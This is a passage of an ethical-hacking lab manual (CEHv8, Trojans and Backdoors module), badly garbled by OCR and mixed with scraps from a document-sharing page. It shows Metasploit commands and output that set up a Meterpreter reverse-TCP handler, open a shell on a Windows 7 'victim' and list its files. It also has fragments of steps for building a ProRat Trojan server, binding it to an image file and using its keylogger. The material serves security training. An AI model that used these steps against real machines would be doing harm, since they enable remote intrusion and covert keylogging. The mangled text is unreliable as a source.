C rea te d by m sfpayload <h t t p : / / * w . n e t a s p l o 1 t . c o 11) .

P ayload: w in d o w s /n e te r p r e te r /r e v e r s e tc p
L ength: 290
O p tio n s: {- LH0ST‫ *<= ״‬10. 0. 0. 6 ‫} ־‬
a k l > u se e x p l o it/m u lti/h a n d le r ^
r s f e x p l o i t ( h a n c le r ) > s e t p ay lo ad w in d o w s /n e te r p r e te r /r e v e r s e tc p
payload => w in d o w s /m e ie r p r e te r /r e v e r s e tc p
aisf e x p l o i t ( h a n d le r) > s e t I h o s t 1 0 .0 .8 .6
I host => 10.0 .0 .6 _
l i l e x p lo it ( handler) > e x p lo it -J -£|
[*] ^loit 1^nnirâ^fca01ô‫״‬r)^|joW/T■ _____________
[ * ] ^ ^ r t ^ t a f e v e r se r a n d ie r of! 1 8 .0 .9 .6 :4 4 4 4
l 3 *‫ ־‬S t a r t i n g t h e p r fy to a d h s r d i e r ^ r r
Lf cl L is.
J iifl e
■lis e xxpploloit(
it (hhandler)
a n d le r ) > [ ‫ ]! •״‬S
Sending
ending StJBc (751121 b y te s ) to 1 0 .0 .0 .5
s t ^ e (751128
!]‫ ־‬J I n t e r p r e t e r s e s s io n 1 opened ( 1 0 .C 6 .6 :4 4 4 4 -> 1 0 .0 .8 .5 :4 9 4 5 8 ) a t , 1 2012-18-23 !?‫־‬: 57152 ♦0530 |
l& T o interact
with th e available
FIGURE 11.16: Exploit result of windows 7 machine
se s s io n , you can
u se s e s s io n s -i 21. To interact with the available session, type the command s e s s io n s -i 1
< sessio n id> and press E nter
FIGURE 11.17: creating the session
22. Enter the command sh ell, and press Enter.

r .
*
1
BackTrack on WIN-D39M RSHL9E4 - Virtual M ach ine C onn ection
‫ך‬
| File Action Media Clipboard V ** Help
\ <n 0 (• ) ® o 11 1►
A pp lications P ia c cs s y s t e m d IX‫׳‬ IUC OCt 23, 3:13 PM
^ a n/ x *!terminal
/ File Edit v ie w ifefm m al H elp
Backc Created by msfpayload ( h ttp ://w w w .n e ta s p lo 1 t.c o ■ >.
Payload: w indow s/n e te rp re te r/re ve rse tcp
Length: 290
O ptions: CLHOST*10. 0. 0. 6“ <■‫}"־‬
n k l > use e x p lo it/m u lti/h a n d le r
msf e x p lo it ( handler) > set payload w in d o w s /n e te rp re te r/re v e rs e tc p
payload *> w in d o w s /m e te rp re te r/re v e rs e tc p
«1 s f e x p lo it ( handler) > set !h o s t 16.6 .8 .6
I host 10.0 .0 .6 <‫־‬
B i l e x p lo it ( handler) > e x p lo it - j - 2
[*J E x p lo it running as background job.
[*1 S ta rte d reverse handler on 10.0.6.6:4444

[ * j S ta rtin g the payload h a n d le r...
I l i l e x p lo it ( handler) > [ * ] Sending stage (752128 bytes) to 10.0 .0 .5
[ * ] M eterpreter session 1 opened (10.6 .0 .6 :4 4 4 4 -> 10.0.0.5:49458) a t 2012-10-
n sf e x p lo it ( handler) > sessions * i 1

[ * ] S ta rtin g in te r a c tio n w ith 1 ...
c!«JS<1V1‫״‬I J Q L |\
M ic ro s o ft Windows T v e / s io if ^ n . 75©tj
LI Q L I V
Copyright (c ) 2009 M ic ro s o ft C orporation. Al r ig h ts reserved,
c :\users\A iH nln\pesktop> |
FIGURE 11.18: Type the shell command
23. Type the dir command and press Enter It shows all the directories
present on the victim machine (Windows 7).
1- 1° ' r ’
<010 ®@e 111►1fe 5

Applications Places system cj
/ a v‫׳‬ x T e rm in a l
../ File Edit View Terminal Help
Backc
»1 s f e x p lo it ( handler) > sessions - i 1
[ - ] In v a lid session id
n sf e x p lo it ( handler) > sessions ■ i 2
[ * ] s ta r tin g in te r a c tio n w ith 2 . . .
in te r p r e te r > s h e ll
Process 2540 created.
Channel 1 crea ted. -
M ic ro s o ft windows [v e rs io n 6.1.76011
C opyright (c ) 2009 M ic ro s o ft C orporation. A l l rig h ts reserved.
C: \Users\Adtnin\Desktop?b i f I
d ir
volume in d riv e c has no la b e l.
Volume S e ria l Nunber i s 6868-71F6
O ire c to ry o f C:\U sers\Adnin\D esktop I

a
10/23/2012 02:56 <0IR> | .
f t p s Ljsis
1e/Sie1^1w,c1 s g f te z 3‫•״־‬w
2 O ir (s )
a
56.679,985.152 b y te s lfre e
C:\Users\Adrn 1 n\Desktop>§
FIGURE 11.19: check die directories of windows 7
Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion 011
your target’s security‫ ״‬posture and exposure dirough public and free information.

P L E A S E TAL K T O Y O U R I N S T R U C T O R IF Y O U H A V E Q U E S T I O N S

M etasploit O u tp u t:
Hack the Windows 7 machine directories
In te rn e t C o n n ectio n R eq u ired
□ Yes 0 No

A l Rights Reserved. Reproduction is Strictly Prohibited.

CEHv8 Module 06 - Trojans and Backdoors

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CEHv8 Module 06 - Trojans and Backdoors

Uploaded by

Copyright:

Available Formats

CEH Lab M an ual

Trojans and Backdoors

& T o o ls L ab E nvironm ent

C E H L ab M an u al P age 425 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

Overview of Trojans and Backdoors

C E H L ab M an u al P age 426 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

Creating a Server Using the ProRat

ICON KEY Lab Scenario

C E H L ab M an u al P age 427 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

‫י‬ Attacking a network using sample Trojans ancl documenting all

Overview of Trojans and Backdoors

C E H L ab M an u al P age 428 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

P f l D H R C H . n E T F«OFE55IC]f‫>־‬HL IflTEHnET !!!

4 . The C reate Server window appears.

E-MAIL: bomberman@y ahoo. com

Server Icon Q Use ICQ Pager Notification

CGI URL: http: //w w w.yoursite. com/cgi-bin/prorat. cgi

5. Click General S ettings to change features, such as Server Port. Server

C E H L a b M a n u a l P a g e 429 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

General Settings Victim Name:

9. Select the Girl.jpg file to bind with the server.

Bind with File

C E H L a b M a n u a l P a g e 430 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

Look in: Images

£Q1 VNC Trojan starts a

File name: Girl Open

Files of type: Cancel

FIGURE 1.5: ProRat binding an image

C E H L ab M an u al P age 431 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

Select Server Extension

Q PIF (Has no icon support) Q COM (Has no icon support)

Bind with File

C E H L ab M an u al P age 432 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

embedded inside any Vicvr M anage A&

______________ Layout_________ Show/hide

1S3J R ecen t places |^ b n d e d .s e r v e r |

1‫ ^־‬f Libraries £ ProRat

F*| D o c u m tn te j__ R eadm e

f c l P ic tu ‫«׳‬c |__ V ersion.R enew als

FIGURE 1.10: ProRat Create Server

16. N ow go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06

C E H L ab M an u al P age 433 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

. p | ‫ י‬T‫׳‬0J%n(Trt>« » Rencte Acr«s "roiflrs RAT( ‫ * י‬PraRat ital

View Oroanize ▼• ‫״‬ ^ 0 ° *°

FIGURE 112: ProRat Connecting Infected Server

C E H L ab M an u al P age 434 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

FIGURE 1.13: ProRat connection window

FIGURE 1.14: ProRat connected computer w idow

FIGURE 1.15: ProRat KeyLogger button

C E H L ab M an u al P age 435 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

23. The Key Logger window will appear.

m Tliis Trojan works

File Edit Format View Help

m Banking Trojans are

C E H L ab M an u al P age 436 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

| Read Log | Delete Log Save as Clear Screen Help

FIGURE 1.18: ProRat KeyLogger window

P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S

C E H L ab M an u al P age 437 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

In tern e t C o n n ectio n R eq u ired

C E H L ab M an u al P age 438 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

Wrapping a Trojan Using One File

& Tools Lab Objectives

______ Layout_ Show/hide

1 Name ■ I - I Size 11 Type 1*1 Date modified 1